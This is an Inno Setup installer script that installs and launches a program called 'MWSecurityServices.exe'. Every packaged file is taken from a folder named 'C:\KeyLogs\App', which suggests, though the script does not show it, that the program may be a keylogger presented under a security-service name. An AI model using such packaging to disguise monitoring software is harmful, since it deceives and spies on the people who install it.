; Script generated by the Inno Setup Script Wizard.
; SEE THE DOCUMENTATION FOR DETAILS ON CREATING INNO SETUP SCRIPT FILES!

#define MyAppName "MWSecurityServicesInstaller"
#define MyAppVersion "1.5"
#define MyAppPublisher "Michael Wang & Co."
#define MyAppURL "https://github.com/MightyKingM/MWSS"
#define MyAppExeName "MWSecurityServices.exe"

[Setup]
; NOTE: The value of AppId uniquely identifies this application.
; Do not use the same AppId value in installers for other applications.
; (To generate a new GUID, click Tools | Generate GUID inside the IDE.)
AppId={{F54F4A18-DCEC-4EA5-8991-57388912FB1E}
AppName={#MyAppName}
AppVersion={#MyAppVersion}
;AppVerName={#MyAppName} {#MyAppVersion}
AppPublisher={#MyAppPublisher}
AppPublisherURL={#MyAppURL}
AppSupportURL={#MyAppURL}
AppUpdatesURL={#MyAppURL}
DefaultDirName={pf}\{#MyAppName}
DisableProgramGroupPage=yes
LicenseFile=C:\Users\Michael\Documents\Visual Studio 2017\Projects\Minecraft\Minecraft\License.txt
OutputDir=C:\Users\Michael\Desktop
OutputBaseFilename=setup
Compression=lzma
SolidCompression=yes

[Languages]
Name: "english"; MessagesFile: "compiler:Default.isl"

[Tasks]
Name: "desktopicon"; Description: "{cm:CreateDesktopIcon}"; GroupDescription: "{cm:AdditionalIcons}"; Flags: unchecked

[Files]
Source: "C:\KeyLogs\App\MWSecurityServices.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\KeyLogs\App\MWSecurityServices.exe"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\KeyLogs\App\MWSecurityServices.exe.config"; DestDir: "{app}"; Flags: ignoreversion
Source: "C:\KeyLogs\App\DSettings.txt"; DestDir: "{app}"; Flags: ignoreversion
; NOTE: Don't use "Flags: ignoreversion" on any shared system files

[Icons]
Name: "{commonprograms}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"
Name: "{commondesktop}\{#MyAppName}"; Filename: "{app}\{#MyAppExeName}"; Tasks: desktopicon

[Run]
Filename: "{app}\{#MyAppExeName}"; Description: "{cm:LaunchProgram,{#StringChange(MyAppName, '&', '&&')}}"; Flags: nowait postinstall skipifsilent

